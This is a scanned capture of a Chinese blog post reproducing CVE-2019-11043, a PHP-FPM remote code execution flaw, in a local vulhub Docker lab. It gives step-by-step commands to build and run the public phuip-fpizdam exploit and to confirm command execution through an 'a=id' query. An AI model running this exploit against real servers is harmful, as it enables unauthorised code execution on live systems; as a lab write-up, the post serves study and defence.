zy5uv-2aaaa-aaaad-qbniq-cai.icp0.io Open in urlscan Pro
2a0b:21c0:b002:2:5000:afff:fee6:a836  Public Scan

URL: https://zy5uv-2aaaa-aaaad-qbniq-cai.icp0.io/archives/78f531e0/index.html
Submission: On November 25 via api from US — Scanned from CH

Form analysis 0 forms found in the DOM

Text Content

小晨曦
 * 首页
 * 标签
 * 分类
 * 归档
 * 关于
 * 友情链接
   * 零组官网
   * 520
   * 迪迪
   * ian
 * 

小晨曦
小晨曦的博客
 * 首页
 * 标签
 * 分类
 * 归档
 * 关于
 * 友情链接
   * 零组官网
   * 520
   * 迪迪
   * ian


CVE-2019-11043复现

漏洞复现
技术分享
发布日期:   2019-10-29
更新日期:   2019-10-29
文章字数:   496
阅读时长:   2 分
阅读次数:   43

--------------------------------------------------------------------------------


漏洞描述

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a
符号时,服务返回异常,疑似存在漏洞。

在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。


漏洞复现

这里直接使用p牛的docker环境进行复现

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

安装DOCKER

bash

apt install docker docker-compose 

启动DOCKER

bash

systemctl start docker

搭建环境

bash

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043
docker-compose up -d

在启动环境前建议先设置镜像加速

在 /etc/docker/daemon.json 写入以下内容(如果不存在文件,请新建)

json

{"registry-mirrors":["https://registry.docker-cn.com"]}

以上是添加 docker 官方提供的中国镜像,也可以选择使用阿里云,中科大等镜像。添加镜像后需要重启docker

bash

sudo systemctl daemon-reload
sudo systemctl restart docker







看到上面的界面代表环境启动成功,默认页面在http://127.0.0.1:8080/index.php







漏洞利用

安装golang,git代码并编译

bash

apt install golang
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go get -v
go build







运行

none

go run . "http://127.0.0.1:8080/index.php"







验证







因为php-fpm会启动多个子进程,在访问/index.php?a=id时需要多访问几次,以访问到被污染的进程

复现完后建议删除或停止容器

bash

docker ps //查看正在运行容器 
docker stop containerId //containerId是容器的ID 
docker ps -a //查看所有容器 
docker ps -a -q //查看所有容器ID 
docker stop $(docker ps -a -q) //停止所有容器 
docker rm $(docker ps -a -q) //删除所有容器

--------------------------------------------------------------------------------

漏洞复现

微信扫一扫:分享



微信扫一扫即可分享!

为正常使用来必力评论功能请激活JavaScript。

 上一篇
Burp Suite v2020.9.2的汉化以及无cmd框启动
2019-12-02 资源分享
资源分享
下一篇 
SQL注入以及UDF提权
熊海CMS的SQL注入以及后续的UDF提权
2019-10-28 技术分享
漏洞复现 sql注入
  目录
 1. 漏洞描述
 2. 漏洞复现


看板娘
欢迎阅读「CVE-2019-11043复现 | 小晨曦」

Copyright © 2019-2022 2019 小晨曦 | Powered by Hexo | Theme Matery
  站点总字数: 7.2k  |  总访问量:  45  |  总访问人数:  45




  搜索